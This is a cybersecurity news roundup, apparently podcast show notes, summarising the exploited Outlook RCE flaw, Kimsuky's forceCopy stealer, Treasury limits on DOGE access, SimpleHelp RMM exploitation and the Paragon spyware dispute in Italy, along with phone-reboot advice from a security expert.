Outlook RCE bug, Kimsuky forceCopy malware, Treasury tightens DOGE
Subscribe to Cyber Security Headlines podcast
Spotify, Apple Podcasts, RSS link, add as an Alexa Skill, or search "Cyber Security Headlines" on your favorite podcast app.
In today’s cybersecurity news…
Critical RCE bug in Microsoft Outlook now exploited in attacks
CISA is warning federal agencies in the U.S. to secure their systems against ongoing attacks targeting a critical Microsoft Outlook remote code execution (RCE) vulnerability. This vulnerability, discovered by researchers at Check Point, and which has a CVE number, is caused by “improper input validation when opening emails with malicious links using vulnerable Outlook versions.” As a result, attackers can gain remote code execution capabilities because “the flaw lets them bypass the Protected View (which should block harmful content embedded in Office files by opening them in read-only mode) and open malicious Office files in editing mode.” Yesterday (Thursday) CISA added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, meaning that federal agencies must secure their networks by February 27.
Kimsuky uses forceCopy malware to steal browser-stored credentials
According to researchers at South Korean AhnLab Security Intelligence Center (ASEC), the hacking group associated with North Korea is apparently conducting spear-phishing attacks to deliver an information stealer malware called forceCopy [sic]. This starts, as usual, with phishing emails that include a Windows shortcut (LNK) file disguised as a Microsoft Office or PDF document. This attachment activates PowerShell or mshta.exe, which is a legitimate Microsoft file run HTML Application (HTA) files. This deploys a trojan named PEBBLEDASH along with a proxy malware that maintains persistent communications with an external network.
Treasury agrees to block additional DOGE staff from accessing sensitive payment systems
Following up on a story we covered on Wednesday, the Treasury Department has now agreed to temporarily block all but two members of the Trump administration’s Department of Government Efficiency (DOGE) team from accessing sensitive payment records and to limit their access to “read-only,” according to a Wednesday court filing. This follows a lawsuit that union groups filed against Treasury Secretary Scott Bessent on Monday. The two members still allowed access are Tom Krause, who is the CEO of a company that owns Citrix and other technology firms, and his employee Marko Elez. Some news outlets have reported that “DOGE has full access to the Treasury payment systems and has the ability to write code controlling most payments made by the federal government.”
领英推荐
Huge thanks to our sponsor, ThreatLocker
British engineering company IMI reports cyber incident
This is the second U.K.-based engineering giant to report a cyber incident to the London Stock Exchange (LSE) in the last nine days. Representatives of the company, which specializes in industrial automation and climate control products, describe the incident as involving “unauthorized access to the company’s systems,” but have declined to elaborate.
SimpleHelp RMM flaws exploited to deploy Sliver malware
The software used by many tech support professionals to access and fix customers’ computers is being abused through three flaws which have CVE numbers, and which hackers are using to “create administrator accounts, drop backdoors, and potentially lay the groundwork for ransomware attacks.” Exploitation in the wild was confirmed by cybersecurity firm Field Effect. The attack involves “exploiting the vulnerabilities in the SimpleHelp RMM client to establish an unauthorized connection to a target endpoint.” The connection was made through an Estonian-based server running a SimpleHelp instance on port 80. Users of SimpleHelp are advised to apply the most recent security updates that address the flaws and to look for administrator accounts named ‘sqladmin’ and ‘fpmhlttech,’ as well as connections to the IPs listed in Field Effect’s report, which is included in the show notes to this episode.
(BleepingComputer and Field Effect)
Paragon ends contract with Italy over spyware scandal
Following up on a story we covered earlier this week, the makers of the infamous Paragon zero click spyware has allegedly ended its relationship with Italy, following revelations that “an Italian investigative journalist and two activists who were critical of Italy’s dealings with Libya were among the people who had allegedly been targeted with the spyware,” with all three of these individuals on the record as being critical of the right wing government of Italy’s prime minister, Giorgia Meloni. Paragon alleges that the Italian government had “breached the terms of Paragon’s contract with the government, which does not allow for journalists or members of civil society to be targeted with the spyware.”
Reboot your phone to avoid spyware, says security expert
Rocky Cole, co-founder of mobile threat protection company iVerify, in an interview with ZDNet, says the best way for people to avoid getting infected by zero-click spyware like Paragon is to reboot their phone regularly, the way they would – or should – with their computers. This is because many of these exploits exist in memory only, as opposed to being files,” he said. That is a default behavior. He also recommends using an internal scanning app to find malicious files in the phone as well as using lockdown mode in Apple devices. He adds that because it is the phone’s underlying vulnerabilities that are exploited – something that only Apple, Google, and their app developers can fix, it is critically important for end users to apply new security patches as soon as possible.
(ZDNet)